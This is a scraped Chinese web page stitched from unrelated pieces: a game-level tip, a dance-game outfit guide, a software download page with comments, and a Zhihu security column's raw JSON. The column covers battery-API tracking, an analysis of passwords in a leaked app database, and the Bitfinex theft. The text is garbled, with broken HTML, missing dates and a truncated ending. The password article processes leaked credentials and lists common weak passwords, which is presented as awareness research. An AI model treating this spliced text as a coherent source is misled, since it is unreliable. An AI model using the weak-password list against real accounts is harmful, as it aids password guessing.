天天爱消除冒险模式301关怎么过关教程_百度知道
天天爱消除冒险模式301关怎么过关教程
我有更好的答案
建议多尝试几次,后面283是个坎283建议前15步尽量将热气球腾到可见的方格中然后做一个爆炸和一个横排或者竖排合并在一起,一爆炸就OK了
采纳率:94%
来自团队:
为您推荐:
其他类似问题
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。QQ炫舞设计师生涯第15章第301关心灵祈祷S、SS、SSS搭配攻略
QQ炫舞设计师生涯第15章第301关心灵祈祷S、SS、SSS怎么搭配?QQ炫舞设计师生涯第15章进行了更新,一起随易玩网小编去下文了解一下QQ炫舞设计师生涯第15章第301关心灵祈祷S、SS、SSS搭配攻略吧!希望能能对大家带来帮助。
第301关 心灵祈祷
<div class="<div class="
最新安卓游戏排行
类别:休闲益智
类别:角色扮演
类别:角色扮演拯救橘子 1.1
打开手机版页面
版本说明软件地址1.0.4查看3.7查看3.2.2查看1.0.3.2查看1.22查看
相关合集:
相关热搜:
生化危机5是一款动作射击类游戏,相信有很多玩家喜欢玩生化危机系列游戏,在看过生化危机5电影之后会对这款游戏充满期待,在游戏中玩家会遇到各种生物,同时也会体验到恐怖的情景,你需要来拯救被丧尸包围的人类,你能成功拯救人类吗?华军软件园提供生化危机5黄金版下载,并提供不同版本的游戏修改器下载,各位玩家还在等什么,一起来看看吧。...
联通下载地址
电信下载地址
移动及其他下载地址
(您的评论需要经过审核才能显示)
我十分赞同楼上对拯救橘子的评价,我给十分!
我怎样下载都是没有声音
不错,我已经破解了,赞一个
很好用哈哈,最喜欢这个拯救橘子了,别的都不怎么样。。
真的很好用啊,没想到发现了这么多优秀的休闲益智软件,不过我还是留着【软件】吧,用出来感情了。
拯救橘子就是好用!呵呵,我喜欢这个休闲益智
拯救橘子确实帮我解决了很多需求,感谢华军软件园
之前听同学说这里有拯救橘子1.1下载,还真有,我找拯救橘子好久了
终于把拯救橘子1.1下载成功了,真心不容易啊
休闲益智推荐
其他用户还推荐了的软件
手机软件最新更新
高清手机壁纸推荐
热门关键词301在路上301在路上关注互联网安全和白帽子黑客群体,301一直在路上。关注专栏更多最新文章{&debug&:false,&apiRoot&:&&,&paySDK&:&https:\u002F\u002Fpay.zhihu.com\u002Fapi\u002Fjs&,&wechatConfigAPI&:&\u002Fapi\u002Fwechat\u002Fjssdkconfig&,&name&:&production&,&instance&:&column&,&tokens&:{&X-XSRF-TOKEN&:null,&X-UDID&:null,&Authorization&:&oauth c3cef7c66aa9e6a1e3160e20&}}{&database&:{&Post&:{&&:{&title&:&如何通过手机电池来监视你?&,&author&:&hi_301&,&content&:&\u003Cp\u003E
如果你被告知,你的\u003Cstrong\u003E电池状态信息会被广告商用来跟踪你\u003C\u002Fstrong\u003E,你会怎么想呢?\u003C\u002Fp\u003E\u003Cp\u003E
然而,这已经成为了现实。\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E
在之前,广告商也经常会用一些烦人的手段来跟踪用户,比如使用超级cookies,或者是通过与一些APP合作,来得到用户信息,有些不法广告商甚至借助于恶意软件。\u003C\u002Fp\u003E\u003Cp\u003E
然而这些东西都太过于明目张胆了,有没有隐秘性更强,广告商更青睐的方法呢?\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E
斯坦福大学的研究人员展示了一种通过\u003Cstrong\u003E监测用户某一段时间内电池的使用情况,来跟踪用户\u003C\u002Fstrong\u003E的方法,准确率高达90%。\u003C\u002Fp\u003E\u003Cp\u003E
原来,问题是出在电池状态API(应用程序编程接口)上。\u003C\u002Fp\u003E\u003Cp\u003E
电池状态API(Battery Status API)是HTML5的重要API之一,已经被内置于许多浏览器中,例如火狐,Chrome和Opera。主要用于检查笔记本电脑、手机或平板电脑等设备的电池状态。\u003C\u002Fp\u003E\u003Cp\u003E
使用该接口是为了让网站拥有者能够获取到用户平板电脑,笔记本或者智能手机的剩余电量,以判断\u003Cstrong\u003E是否要为用户提供省电版网站\u003C\u002Fstrong\u003E。\u003C\u002Fp\u003E\u003Cp\u003E
研究人员称,电池状态API提取用户电池的电量、充电时间和放电时间。这些数据综合起来有约1400万种组合,意味着允许黑客\u003Cstrong\u003E对用户设备创建一个数字指纹\u003C\u002Fstrong\u003E,从而跟踪用户的网络行为。\u003C\u002Fp\u003E\u003Cp\u003E
在很短的时间间隔内(API所收集的数据每30秒更新一次),电池状态API可被用于\u003Cstrong\u003E追踪用户身份\u003C\u002Fstrong\u003E,这类似于浏览器的cookie。在企业环境下,设备拥有相似的特征和IP地址,而电池信息可以用来\u003Cstrong\u003E区分每一台设备\u003C\u002Fstrong\u003E。\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E
业内人士称,这种身份追踪很难避免,因为\u003Cstrong\u003E几乎所有的移动设备都受此影响\u003C\u002Fstrong\u003E。对于功能下降的老旧电池,其风险跟更大。\u003C\u002Fp\u003E\u003Cp\u003E
安全研究人员还发现了两个隐藏在互联网上进行大规模跟踪的脚本,脚本借助于电池状态API来收集用户数据,这也从侧面证明了此技术的可行性。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E
那我们有什么好的应对方法吗? \u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E一些常规的方法,比如删除浏览器cookies,使用VPN或安装广告拦截插件AdBlockers等都不能解决这一问题。
\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E
唯一解决的方法就是将你的智能手机连接到电源线上,让其\u003Cstrong\u003E电量变化不再呈现规律性\u003C\u002Fstrong\u003E,或者是\u003Cstrong\u003E厂家调整电池状态信息读数\u003C\u002Fstrong\u003E,不要让电池状态信息过于精准。这样的话,该API的功能不会受到很大影响,同时又能避免被黑客或广告商所利用。\u003C\u002Fp\u003E\u003Cp\u003E
Uber的经济研究主管,Keith Chen称,公司已经开始关注这方面技术,并尝试监控用户的电池余量,因为用户手机电量快耗尽时,更愿意支付比平时高的价格来打车。\u003C\u002Fp\u003E\u003Cp\u003E
小伙伴你有什么好的解决思路,或者是对这件事情的看法,可以留言或者是在评论区进行评论哦。\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E\u003Cstrong\u003E其他推荐:\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E1、\u003C\u002Fstrong\u003E\u003Cstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=842ece66f0f&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&重磅分享 | 白帽子黑客浅谈顾问式销售与服务\&\u003E重磅分享 | 白帽子黑客浅谈顾问式销售与服务\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E2、\u003C\u002Fstrong\u003E\u003Cstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=b2778cafdee9b1a7f63eb1fc75025fdc&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&安全观点:企业信息安全十大痛点,你中招了?\&\u003E安全观点:企业信息安全十大痛点,你中招了?\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E3、\u003C\u002Fstrong\u003E\u003Cstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=cf6cb8a5573a11afa0a315ad4bebba13&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&招人必看!301浅谈国内安全人才薪酬现状\&\u003E招人必看!301浅谈国内安全人才薪酬现状\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E长按二维码关注301公众号\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cbr\u003E&,&updated&:new Date(&T11:09:56.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:7,&likeCount&:28,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T19:09:56+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic2.zhimg.com\u002F34cedb4cbc8a8_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:7,&likesCount&:28},&&:{&title&:&看我如何分析网站运营数据的真伪?&,&author&:&hi_301&,&content&:&\u003Cp\u003E\u003Cb\u003E作者简介:\u003C\u002Fb\u003E战龙,卫士通攻防实验室核心成员,安全研究员。现从事通信保密和密码技术的研究,研究领域涉及密码破解,口令强度校验,系统安全加固。曾就职多家安全企业,在密码破解方面积累了丰富的经验。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E前言:\u003C\u002Fb\u003E2016年数据泄露事件层出不穷,五月份就爆出LinkedIn的1.17亿条登录凭据,4.27亿条MySpace用户凭据,被黑客分别以5比特币和6比特币的价格出售。\u003C\u002Fp\u003E\u003Cp\u003E
2016年7月,有人泄露了日之前的某海外网站的数据库,并将其公布在了互联网上。\u003C\u002Fp\u003E\u003Cp\u003E
网上公布的数据比较杂乱,我们本着对用户密码使用习惯进行分析的目的,对数据进行了整理,删除了敏感信息,仅保留了密码字段。\u003C\u002Fp\u003E\u003Cp\u003E
此海外网站的数据库来自于互联网,本文对其进行密码行为分析,只是本着安全研究的目的,以此来增强大家的安全意识和密码使用习惯。在此,我们郑重声明,反对任何非法的,未经授权的渗透测试活动,特别是拖库行为。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E密码预处理:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E
首先,我们使用AWK文本处理工具,对密码进行预处理,提取Hash值\u003C\u002Fp\u003E\u003Cblockquote\u003E\u003Cp\u003Eawk -F \&,\&
'{a[$2]++}END{for(i in a){print i,a[i] }}' xxx.media\\private\\database.sql & passwords.log\u003C\u002Fp\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E
然后,按重复率进行排序\u003C\u002Fp\u003E\u003Cblockquote\u003E\u003Cp\u003Esort -k 2 passwords.log & passwords.sort\u003C\u002Fp\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E\u003Cb\u003E密码加密方式分析:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E
首先,我们需要分析一下密码的加密算法。\u003C\u002Fp\u003E\u003Cp\u003E
这里,我们对弱密码\&123456\&计算md5值,经过比对发现,这一md5值与第19个Hash值相同,所以基本可以确定其密码使用的是单次md5加密,没有加salt,也没有进行二次md5,这也就导致其密码很容易被破解为明文。\u003C\u002Fp\u003E\u003Cp\u003E密码统计分析\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cbr\u003E\u003Cp\u003E
从上表我们可以看出,有85万用户的口令为空,口令为常见弱口令()的有27万。\u003C\u002Fp\u003E\u003Cp\u003E
除此之外,剩下的更多的用户口令都是以fwe,qwe开头,以123456的变形作为结尾,不同口令在数量上也大致相同。\u003C\u002Fp\u003E\u003Cp\u003E
虽然都是弱密码,但是上述的弱口令与我们常见的弱口令却存在很大差异。\u003C\u002Fp\u003E\u003Cp\u003E附:\u003C\u002Fp\u003E\u003Cp\u003E国内常见弱口令\u003C\u002Fp\u003E\u003Cp\u003E
11,,,888888,abcdef,abcabc,abc123,a1b2c3,aaa111,123qwe,qwerty,qweasd,admin,password,p@ssword,passwd,iloveyou,3C\u002Fp\u003E\u003Cp\u003E国外常见若口令\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E
password,345678,qwerty,abc123,monkey,1234567,letmein,trustno1,dragon,baseball,111111,iloveyou,master,sunshine,ashley,bailey,passw0rd,shadow,4321,superman,qazwsx,michael,football\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E
通过以上分析,再想到此App短期内快速攀升到美国,香港,印尼,台湾,新加坡等地的App Store的免费App的排行榜前列。\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E
由此,我们是否可以有理由怀疑,\u003Cb\u003E这些用户是不是真实用户呢?这些用户很大可能是为了刷排名榜而存在的僵尸用户。\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E密码长度分析:\u003Cbr\u003E\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E
总密码量为(约2000万),其中大部分为8位密码,8位密码总计为(约1400万),占全部密码的67.77%。\u003C\u002Fp\u003E\u003Cp\u003E
此App的密码策略要求密码长度为8-20位,所以大部分人选择了8位,这样就不难理解了。因为过于长并且没有任何含义的口令,用户是比较难记忆的。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E结论:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E①.8,9,10,11位密码占总密码数的84%。\u003C\u002Fp\u003E\u003Cp\u003E②.按密码长度占比由高自低: 8 & 10 & 9 & 6 & 7。\u003C\u002Fp\u003E\u003Cp\u003EPS:虽然密码限制的长度需要至少八位,但是还是能发现有小于8位长度的密码存在。\u003C\u002Fp\u003E\u003Cp\u003E③.8位密码比例为67.77%。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cb\u003E密码组成结构分析:\u003C\u002Fb\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E
由上图分析可以得出,8位长度的密码中,用纯数字组成密码的情况很少,更多的是由数字和字母进行混合的密码。\u003C\u002Fp\u003E\u003Cp\u003E
用l代表字符,d代表数字,我们对各种长度的混合密码进行一下结构分析。\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E\u003Cb\u003E经验与教训:\u003C\u002Fb\u003E\u003C\u002Fp\u003E\u003Cp\u003E
本网站的用户口令仅计算了一次md5就储存在了数据库之中,这是非常不安全的。我们应当采用更加安全的Hash函数,并且对用户口令进行加salt处理等,以此来加强网站的数据保护能力。\u003C\u002Fp\u003E\u003Cp\u003E免责声明:本文的目的是进行安全研究和提高用户安全意识,数据库来自于网络公开数据。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E其他推荐:\u003C\u002Fstrong\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E0、\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=842ece66f0f&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&重磅分享 | 白帽子黑客浅谈顾问式销售与服务\&\u003E重磅分享 | 白帽子黑客浅谈顾问式销售与服务\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E1、\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=b2778cafdee9b1a7f63eb1fc75025fdc&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&安全观点:企业信息安全十大痛点,你中招了?\& class=\&\&\u003E安全观点:企业信息安全十大痛点,你中招了?\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E2、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=c3931efa25bdaef535b60ce&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&成长型互联网企业该如何构建安全团队—第一季\&\u003E\u003Cstrong\u003E成长型互联网企业该如何构建安全团队—第一季\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E3、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=d56e1eda1&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&这才是互联网与安全团队需要的几种人才!\&\u003E\u003Cstrong\u003E这才是互联网与安全团队需要的几种人才!\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E4、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=c22fd0eb6f&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&白帽子黑客:EX,还记得我们一起去太平山顶的约定么?\&\u003E\u003Cstrong\u003E白帽子黑客:EX,还记得我们一起去太平山顶的约定么?\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E5、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=f14c37fe86&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&少年黑客:我的初恋女友,你在哪里?\&\u003E\u003Cstrong\u003E少年黑客:我的初恋女友,你在哪里?\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E6、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=66f3b43c15e29b592c1c1&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&开春巨献!全球TOP500安全公司到底在做些什么\&\u003E\u003Cstrong\u003E开春巨献!全球TOP500安全公司到底在做些什么\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E7、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=406ded7bebb1f&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&2015年至今国内信息安全领域那些投资那些事\&\u003E\u003Cstrong\u003E2015年至今国内信息安全领域那些投资那些事\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E8、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=0df62b06fbac0238b5eaf&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&301:浅谈互联网安全现状与攻击趋势\&\u003E\u003Cstrong\u003E301:浅谈互联网安全现状与攻击趋势\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E9、\u003C\u002Fstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=cf6cb8a5573a11afa0a315ad4bebba13&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&招人必看!301浅谈国内安全人才薪酬现状\&\u003E\u003Cstrong\u003E招人必看!301浅谈国内安全人才薪酬现状\u003C\u002Fstrong\u003E\u003C\u002Fa\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E10、\u003C\u002Fstrong\u003E\u003Cstrong\u003E\u003Ca href=\&http:\u002F\u002Fmp.weixin.qq.com\u002Fs?__biz=MzIwMTQ2NzY4NA==&mid=&idx=1&sn=19396bda6ceefacb43692&scene=21#wechat_redirect\& data-editable=\&true\& data-title=\&301:从安全角度浅谈云计算服务平台现状与发展\&\u003E301:从安全角度浅谈云计算服务平台现状与发展\u003C\u002Fa\u003E\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E\u003Cstrong\u003E长按二维码关注301公众号\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E合作联系:2036234(备注单位+名字)\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E&,&updated&:new Date(&T04:35:48.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:0,&likeCount&:5,&state&:&published&,&isLiked&:false,&slug&:&&,&isTitleImageFullScreen&:false,&rating&:&none&,&sourceUrl&:&&,&publishedTime&:&T12:35:48+08:00&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&url&:&\u002Fp\u002F&,&titleImage&:&https:\u002F\u002Fpic3.zhimg.com\u002Fe70c363dceae1b66c5da60_r.jpg&,&summary&:&&,&href&:&\u002Fapi\u002Fposts\u002F&,&meta&:{&previous&:null,&next&:null},&snapshotUrl&:&&,&commentsCount&:0,&likesCount&:5},&&:{&title&:&比特币快被黑客们偷完了!&,&author&:&hi_301&,&content&:&\u003Cp\u003E比特币一直以来都是一个备受争议的话题。\u003C\u002Fp\u003E\u003Cp\u003E一方面由于其交易的\u003Cstrong\u003E匿名性\u003C\u002Fstrong\u003E和数量的\u003Cstrong\u003E稳定性\u003C\u002Fstrong\u003E,许多国外走在法律边缘的行业都喜欢使用这一货币进行结算,比如\u003Cstrong\u003E勒索软件要求使用比特币来支付赎金\u003C\u002Fstrong\u003E。但是另一方面,由于其缺乏管控,所以国际热钱经常会扰乱其经济秩序,来谋取利益。\u003C\u002Fp\u003E\u003Cp\u003E然而这一切的操作,都是基于比特币本身是安全的来讲的,但是如果比特币本身都不安全了呢?\u003C\u002Fp\u003E\u003Cimg src=\&600f5a417f09515fde424f.jpg\& data-rawwidth=\&1024\& data-rawheight=\&966\&\u003E\u003Cp\u003E日,即周二晚间,总部位于香港的数字货币交易所Bitfinex,在其官网发布公告称:\u003C\u002Fp\u003E\u003Cblockquote\u003E\u003Cp\u003E\u003Cstrong\u003E黑客对平台进行了攻击,有些用户的比特币也因此被盗\u003C\u002Fstrong\u003E。为了确认哪些用户受到了影响,我们需要对系统中漏洞产生的原因以及此次攻击事件展开调查。\u003C\u002Fp\u003E\u003Cp\u003E
为了进行调查和保护交易环境,将临时\u003Cstrong\u003E暂停所有交易\u003C\u002Fstrong\u003E,包括电子货币的存取,\u003Cstrong\u003E网站也暂时停止运作\u003C\u002Fstrong\u003E。\u003C\u002Fp\u003E\u003C\u002Fblockquote\u003E\u003Cp\u003E我们先讨论一下货币的安全性问题。货币的安全性主要由两点决定:\u003C\u002Fp\u003E\u003Cp\u003E
1.货币自身的安全性\u003C\u002Fp\u003E\u003Cp\u003E
2.货币的交易安全性\u003C\u002Fp\u003E\u003Cp\u003E
数字货币,例如比特币,是通过数学算法挖矿形成的,所以其货币自身的安全性十分可靠,远高于实体的纸币。\u003C\u002Fp\u003E\u003Cbr\u003E\u003Cp\u003E
比特币作为一种数字货币,在数字货币的流通过程中,其安全性更多的依赖于交易安全性,具体由如下原因所:\u003C\u002Fp\u003E\u003Cp\u003E
1.交易所的风险控制能力\u003C\u002Fp\u003E\u003Cp\u003E
2.交易所对于网络攻击的防御能力\u003C\u002Fp\u003E\u003Cp\u003E
而像比特币被盗这一类事件,一般是由于第二种原因所导致的。\u003C\u002Fp\u003E\u003Cp\u003E
作为最大的比特币交易所之一的Bitfinex,同时也是Ethereum和莱特币等数字货币的交易所。该交易所作为最大的基于美元的比特币交易所,是全球第三大比特币交易所,仅次于用人民币报价的OKCoin和比特币中国(BTC China)。\u003C\u002Fp\u003E\u003Cp\u003E
该官方对平台系统进行了停机检查,结果发现了一安全漏洞,这一漏洞可能会使攻击者\u003Cstrong\u003E绕过Bitfinex的提款授权限制\u003C\u002Fstrong\u003E,从而窃取用户的比特币。\u003C\u002Fp\u003E\u003Cimg src=\&699f38aacd8b4b8c315cc8.jpg\& data-rawwidth=\&500\& data-rawheight=\&371\&\u003E\u003Cp\u003E公司公告中并没有提及损失总金额,但是Bitfinex交易所的社区与产品开发部主管Zane Tackett证实,被盗窃的比特币总量高达119756比特币(约12万比特币),价值7200万美元。\u003C\u002Fp\u003E\u003Cp\u003E
Bitfinex发布的公告称,此次攻击中只有个人账户受到了影响,公司将设法赔偿客户损失,为受此漏洞影响的个人客户负责,并将按照当时(即国际标准时间18时)的比特币市场价格处理。\u003C\u002Fp\u003E\u003Cp\u003E
尽管目前还不清楚Bitfinex是否可以承担如此巨大的损失,但是该公司保证,在调查完成之后,将尽量弥补客户们的损失。\u003C\u002Fp\u003E\u003Cp\u003E
8月2日,Bitfinex被黑这一重磅消息爆出之后,比特币价格在美国下滑20%,从604美元降至482美元,标志着两个月的最低点。不过,据另一家基于美元的交易所itBit的数据,8月3日香港时间傍晚时分,比特币价格已恢复到544.71美元。\u003C\u002Fp\u003E\u003Cp\u003E
此次黑客攻击事件是比特币价格下降的直接原因,因为该事件导致比特币投资者们失去了信心,对比特币的安全性产生怀疑,从而抛售了他们手中的比特币,导致比特币价格快速下降。\u003C\u002Fp\u003E\u003Cp\u003E
然而就在几周前,美国监管机构警告称,比特币之类的数字货币可能会因经营者在分布式记账系统方面经验有限,而对金融稳定产生影响,而这类系统的漏洞可能要在它们部署到一定规模后才会显露出来。\u003C\u002Fp\u003E\u003Cp\u003E
没想到的是,这些话很快一语成谶。\u003C\u002Fp\u003E\u003Cimg src=\&14e239be615a490beaf6e8.jpg\& data-rawwidth=\&500\& data-rawheight=\&313\&\u003E\u003Cp\u003E尽管就目前的调查结果,还无法得知此次黑客攻击的具体细节,但是在比特币社区内部,已经有许多人开始怀疑比特币所宣称的多重签名机制的有效性。\u003C\u002Fp\u003E\u003Cp\u003E
根据这种机制,至少需要保存在不同地点的两个私钥才能完成交易,那么,黑客是如何转移这些比特币的呢?\u003C\u002Fp\u003E\u003Cp\u003E
Bitfinex采用多重签名机制的先驱BitGo。8月3日,BitGo在推特上表示,没有证据表明BigGo的服务器遭到了入侵。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E那该如何保障比特币账户的安全呢?\u003C\u002Fstrong\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E
最好的方法就是让你的比特币处于离线状态。\u003C\u002Fp\u003E\u003Cp\u003E
一位接近Bitfinex的人士分析称,此次被盗主要是因为Bitfinex使用了热钱包。\u003C\u002Fp\u003E\u003Cp\u003E
热钱包,是比特币存储钱包的一种模式。即一直联网且无需下载所有数据即可实现比特币的储存功能,但问题在于安全系数较低。\u003C\u002Fp\u003E\u003Cp\u003E
冷钱包,是比特币存储钱包的另一种模式,即不联网的钱包。用户在下载冷钱包时,需要将比特币网络从开始到现在的所有数据全部下载下来,将比特币转入,然后断开网络。\u003C\u002Fp\u003E\u003Cp\u003E
优势是安全性高,但如果存储冷钱包的硬件设施损坏,相应的比特币也会面临损失。\u003C\u002Fp\u003E\u003Cp\u003E
国内平台一般实施冷热钱包技术同时使用的方案。\u003C\u002Fp\u003E\u003Cp\u003E
比特币虽然存在一些安全问题,但是其众多优点也被人们所看好,有人说比特币未来将取代货币,成为全球性通用货币,你怎么看呢?\u003C\u002Fp\u003E\u003Cp\u003E
货币数字化带来的网络安全问题,你又是怎么看待呢?\u003C\u002Fp\u003E\u003Cp\u003E
谁控制了货币,谁就控制了全世界,黑客将会控制全世界吗?\u003C\u002Fp\u003E\u003Cp\u003E
欢迎留言,讲出自己的看法~\u003C\u002Fp\u003E\u003Cp\u003E
最后,让我们通过回顾一些关于数字货币的安全事件来结束本文。\u003C\u002Fp\u003E\u003Cul\u003E\u003Cli\u003E\u003Cp\u003E日,一个旨在展示虚拟货币安全可靠性,并且不会被盗的实验性基金遭到黑客攻击,总价超过5000万美元的以太币被盗。\u003C\u002Fp\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Cp\u003E日。比特币平台Gatecoin表示,最近的一次黑客攻击导致了185,000枚以太币和250枚比特币的损失,总价值200万美元,占平台总资产的15%。Gatecoin表示正在筹集资金以弥补损失。\u003C\u002Fp\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Cp\u003E日,BitQuick在网络攻击后宣布关闭平台2到4周,在探测到攻击之后服务器立即关闭以防止任何进一步的损失。\u003C\u002Fp\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Cp\u003E日,世界第三大比特币交易所Bitstamp近日因一次黑客攻击丢失了540万美元(3350万人民币)的比特币。此后,总部位于斯洛文尼亚的这家公司被迫停止交易。这次攻击大约损失了19000个比特币。\u003C\u002Fp\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Cp\u003E2014年2月,曾经全球交易量市场占有率最高的比特币交易商“Mt.Gox”向东京地方法院申请破产保护,原因就是公司网络遭遇大规模的黑客攻击,大部分比特币被黑客窃取,总价值达4.7亿美元。\u003C\u002Fp\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Cp\u003E2013年,当时全球比特币第三大交易平台Vircurex曾遭到了两次黑客袭击,造成了部分用户资金损失。\u003C\u002Fp\u003E\u003C\u002Fli\u003E\u003C\u002Ful\u003E\u003Cbr\u003E\u003Cp\u003E\u003Cstrong\u003E其他推荐:\u003C\u002Fstrong\u003E\u003C\u002Fp\u003E\u003Cp\u003E\u003Cstrong\u003E1、\u003C\u002Fstrong\u003E\u003Cstrong\u003E\u003Ca 